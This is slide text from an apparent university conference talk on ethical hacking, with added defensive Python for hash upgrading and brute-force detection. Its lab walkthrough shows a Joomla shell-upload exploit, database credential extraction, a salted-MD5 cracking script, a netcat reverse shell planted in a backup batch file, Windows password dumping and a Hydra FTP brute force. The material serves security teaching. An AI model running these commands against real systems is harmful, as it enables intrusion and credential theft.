Ethical hacking 101 - Singapore RSA 2019 | PPTX
Ethical Hacking 101
Associate Professor Paul Haskell-Dowland
Associate Dean (Computing and Security)
Edith Cowan University
p.haskelldowland@ecu.edu.au
@pdowland
Welcome
Extreme Health Warning
• Identify vulnerable service (website)
• Exploit vulnerabilities
• Gain remote access
• Escalate privileges
• Probe internal network
• Role of penetration testing
Outline
Source: https://commons.wikimedia.org/wiki/File:Cliche_Hacker_and_Binary_Code_(26946304530).jpg
• Identify the target
• Scour the web
• Specialist websites
• Shodan
• Ask people
• Underground discussion
forums
• Social engineering
Where do we start?
Identify vulnerable website
https://pentest-tools.com/information-gathering/find-subdomains-of-domain
Target specific vulnerability
• Having identified Joomla – now deploy a simple script…
root@kali:~# perl jce.pl hack.me
.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.
|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||
[*] Checking Exploitability ...
[*] Trying to upload 0day.gif ...
[*] Trying to change extension from .gif to .php ...
[+] 0day.php was successfully uploaded
[+] Path:hack.me/images/stories/0day.php?cmd=id
Upload further exploits
Examine CMS configuration files
• Find blog config and get MySQL credentials
/* Database Settings */
var $host = 'localhost';
var $user = 'root';
var $password = 'root';
var $db = 'blog';
var $dbprefix = 'jos_';
Retrieve a ‘super administrator’ account
<?php
// Connect with the credentials recovered from the CMS configuration file
$servername = "localhost";
$username = "root";
$password = "root";
$db = "blog";
$conn = mysqli_connect($servername, $username, $password, $db);
// Joomla keeps accounts in <prefix>users; look up the super administrator
$sql = "SELECT * FROM jos_users WHERE usertype='Super Administrator';";
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);
echo $row['username'];
echo "<br/>";
echo $row['password'];   // stored as hash:salt
mysqli_close($conn);
?>
Get blog admin password
• Joomla uses a simple hashing mechanism:
md5(password+salt)
• E.g.
md5($strLoginPassword."Ckbco8niuZ6ZR9lSnB80I8NtJki325j2")
• Stored as hash:salt
• Write a simple script with a password list
fdb3d81d39d925c1332559d2ea53823e:Ckbco8niuZ6ZR9lSnB80I8NtJki325j2
Crack MD5 hash (with salt)
<?php
// Salt taken from the stored hash:salt value
$salt = "Ckbco8niuZ6ZR9lSnB80I8NtJki325j2";
$handle = fopen("top500.txt", "r");
while (($line = fgets($handle)) !== false)
{
    // Recreate Joomla's md5(password . salt) for each candidate password
    $hash = md5(trim($line) . $salt);
    echo "Trying: " . $hash . "<br/>";
    if ($hash == "fdb3d81d39d925c1332559d2ea53823e")
        echo "<b>Password is: " . trim($line) . "</b><br/>";
}
fclose($handle);
?>
123456
password
12345678
1234
12345
dragon
qwerty
mustang
letmein
baseball
master
...
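To show the weakness from the defender's side, here is an added Python example (not from the slides): it reproduces the md5(password + salt) / hash:salt format above, detects such legacy records, audits them against a common-password list, and rehashes them with PBKDF2 at the user's next successful login. The PBKDF2 storage format and iteration count are assumptions of this example, not Joomla's.

```python
import hashlib
import hmac
import os
from typing import Optional

SALT_LEN = 32           # length of the legacy Joomla salt shown on the slides
PBKDF2_ITERS = 200_000  # assumption: iteration count for the replacement scheme

def legacy_hash(password: str, salt: str) -> str:
    """The scheme on the slides: md5(password + salt), stored as 'hash:salt'."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"

def is_legacy(stored: str) -> bool:
    """A 32-hex-char digest, ':' and a 32-char salt marks a legacy record."""
    digest, sep, salt = stored.partition(":")
    return sep == ":" and len(digest) == 32 and len(salt) == SALT_LEN

def verify_legacy(password: str, stored: str) -> bool:
    digest, _, salt = stored.partition(":")
    candidate = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

def pbkdf2_hash(password: str, salt: bytes = b"") -> str:
    """Replacement format (assumed, not Joomla's): pbkdf2_sha256$iters$salt$dk."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERS)
    return f"pbkdf2_sha256${PBKDF2_ITERS}${salt.hex()}${dk.hex()}"

def verify_pbkdf2(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

def login_and_upgrade(password: str, stored: str):
    """Check a login; a correct password against a legacy record also yields
    a PBKDF2 value to write back, so the MD5 records disappear over time."""
    if is_legacy(stored):
        if not verify_legacy(password, stored):
            return False, stored
        return True, pbkdf2_hash(password)
    return verify_pbkdf2(password, stored), stored

def weak_password_audit(stored: str, wordlist: list) -> Optional[str]:
    """Defender's audit of a legacy record against common passwords:
    the same test the slide's script performs, here run on your own users."""
    for word in wordlist:
        if verify_legacy(word, stored):
            return word
    return None
```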
Launch a remote shell
• Use netcat
• cryptcat also available
Escalate privileges
...
@echo Dumping blog
@"C:\Program Files (x86)\MySQL\MySQL Server 5.5\bin\mysqldump.exe" --user=%dbuser% --password=%dbpass% --databases blog --log-error="C:\Backup\dumperrors.txt" > "C:\Backup\blog.%backupdate%.sql"
START c:\inetpub\wwwroot\images\stories\nc 10.0.2.1 80 -e cmd.exe
Get Windows passwords
>pwdump7
Administrator:500:NO PASSWORD*********************:47443E24FE435EB5210D9FEF2847659D:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
hackme:1004:NO PASSWORD*********************:F1B94635FACC09D9FCC637A113DC10B1:::
hackme2:1005:NO PASSWORD*********************:079F890A968B7F710A373ABB79EB11EB:::
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
Took about 15 mins
Used two rainbow tables (2^38 and 2^39 passphrases)
~800 billion phrases
FREE!
http://ophcrack.sourceforge.net/
Scan internal network
>nmap -sn 10.0.2.0/24
nmap -sn 10.0.2.0/24
Starting Nmap 7.01 ( https://nmap.org ) at 2017-05-23 14:46 GMT Daylight Time
Nmap scan report for 10.0.2.1
Host is up (0.013s latency).
MAC Address: 08:00:27:98:38:DB (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.0.2.99
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.59 seconds
>nmap 10.0.2.99
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 10.0.2.99
Host is up (0.00s latency).
Not shown: 1084 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Access FTP share
>hydra -l hackme -P top500.txt ftp://10.0.2.99
hydra -l hackme -P top500.txt ftp://10.0.2.99
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 15:01:13
[DATA] max 16 tasks per 1 server, overall 64 tasks, 500 login tries (l:1/p:500), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.0.2.99 login: hackme password: qwerty
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 15:01:13
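From the defender's side, a burst like the one above (500 login tries from one client in about a second) stands out in the FTP server's own log. The following Python is an added example, not from the slides: it assumes a vsftpd-style log line format, builds a constructed log that mimics the Hydra run, and applies a sliding-window rule that raises an alert on the burst and flags the later successful login from the same client as a likely guessed password.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# vsftpd-style log line (format assumed; the sample below is constructed, not captured):
#   Tue May 23 15:01:13 2017 [pid 2301] [hackme] FAIL LOGIN: Client "10.0.2.1"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[\d.]+)"$'
)
TS_FMT = "%a %b %d %H:%M:%S %Y"

def parse(line):
    """Return (timestamp, user, result, client_ip), or None for non-matching lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], TS_FMT), m["user"], m["result"], m["ip"]

def detect_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Sliding-window rule: alert on a client IP with >= threshold FAIL LOGINs inside
    `window`; an OK LOGIN from that IP afterwards is flagged as a likely guessed password.
    Returns (alerts, cracked): {ip: time of first alert}, {ip: user that then logged in}."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts, cracked = {}, {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, user, result, ip = rec
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = ts
        elif ip in alerts:
            cracked[ip] = user
    return alerts, cracked

def constructed_log():
    """Constructed sample: one normal login, then a Hydra-like burst of 500 guesses
    from 10.0.2.1 in about two seconds, ending in a successful login."""
    base = datetime(2017, 5, 23, 15, 1, 13)
    fmt = lambda t: t.strftime(TS_FMT)
    lines = [f'{fmt(base - timedelta(minutes=5))} [pid 2000] [alice] OK LOGIN: Client "10.0.2.50"']
    for i in range(500):
        t = base + timedelta(milliseconds=4 * i)
        lines.append(f'{fmt(t)} [pid {2100 + i}] [hackme] FAIL LOGIN: Client "10.0.2.1"')
    lines.append(f'{fmt(base + timedelta(seconds=2))} [pid 2600] [hackme] OK LOGIN: Client "10.0.2.1"')
    return lines
```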
So, why ethical hacking / penetration testing?
• A controlled evaluation of vulnerabilities
• Compromised on your terms
• Rules of engagement
• Permissions
• Extent (how deep)
• But can also be wide (subsidiaries, supply chain)
• Agree up front the ‘what if’ scenarios
• e.g. if the team get into the CEO’s email or the payroll system…
• Privacy/ethics
• What do you want from the process?
• Reporting
Considerations
• Plan when the test will happen
• Think about implications for systems
• Will it be covert?
• Will colleagues detect (or react to) the activity?
• Careful of ‘automated penetration testing’
• Need a report you can action…
• Think about the security of the pen test
• Embarrassing if a pen tester is piggybacked by a hacker
• Think about any backdoors left open (physical and virtual)
Frameworks
• Phases
• Penetration testing can be split into a number of ‘classic’ phases:
Penetration Testing Phase
1. Reconnaissance
2. Scanning
3. Gaining access
4. Maintaining access
5. Covering tracks
• A more ‘formal approach’
• Information Gathering
• Information Analysis and Planning
• Vulnerability Detection
• Penetration
• Attack/Privilege Escalation
• Analysis and reporting
• Clean-up
A pen-tester's perspective
Classic Phases
Reconnaissance
• Simply gathering data
• Doesn’t have to even involve a computer
• Social engineering
• Use the Internet to search for information
• Google (and other engines)
• The Internet Archive (Wayback Machine)
• Social media
• The company’s own website!
Social engineering
Scanning
• Target discovery
• Enumerating services
• Vulnerability mapping
• Looking for countermeasures
• Documenting as you go along
Scan tools
Gaining access
• Exploiting discovered targets
• Sniffing and cracking
• Privilege escalation
• Application execution and exploitation
• Keylogging and log access
WiFi
Completing the process
Maintaining access:
• Use of backdoors
• Think about security consequences
• What if a ‘real’ hacker discovers your backdoor?
• Document changes you make
• Refer back to target brief
• Exfiltration of data could be overt or covert
Covering tracks:
• Think about the ‘impression’ you leave behind on systems
• Not just the ones you target
• Remote logging
• Firewall and IDS logs
• Logging in transit systems
Reporting:
• Remember who the client is!
• May need detailed and summary documentation
• Executive summary
• Should include recommendations
• Must be actionable
Other tools
Useful links
• https://www.virtualbox.org/
• https://www.kali.org/
• https://nmap.org/zenmap/
• http://ophcrack.sourceforge.net/
• https://www.wireshark.org/
• https://www.pathanalyzer.com/
• http://www.webextractor.com/
• https://www.shodan.io/
• https://pentest-tools.com/information-gathering/find-subdomains-of-domain
Want to know more?
• Bachelors courses:
• Computer Science
• Counter Terrorism Security and Intelligence
• Cyber Security
• Information Technology
• Security
• Honours
• Computer Science
• Information Technology
• Security
• Masters by Coursework
• Computer Science
• Cyber Security
• Masters by Research
• Computing and Security
Computing & Security Courses
• ECU’s School of Science are developing new lab facilities to provide cutting edge laboratory environments for students in 2020.
• We are building brand new facilities including:
• $48m Science building
• Superlabs
• $2.5m Cyber 2.0 facility
• New IT labs
• Security Operations Centre
New facilities
• All computing & security courses available
fully online
• New block-based delivery model is perfect for updating skills, re-training or career development (M.Cyber)
• 20 credit units delivered in 6 week intensive blocks
• Rotating carousel of units allowing flexibility to step on/off in line with work and family commitments
Study online
• Study in Melbourne/Sydney
• Graduate Certificate/Diploma of Cyber Security
• Master of Cyber Security
• Semester teaching model
• Available full time only
Study in Melbourne/Sydney
• Study in Singapore with ECU & PSB Academy
• Bachelor of Science (Cyber Security)
• Graduate Certificate of Cyber Security
• Master of Cyber Security
• Trimester teaching model (Bachelors)
• Masters available in block-based sequential delivery (one module over 6 weeks)
• Available full and part time
Study in Singapore
Questions?
ECUWORLDREADY.COM.AU
ECU Journey edithcowanuni edithcowanuniversity
edithcowanuniversityschool/edith-cowan-university
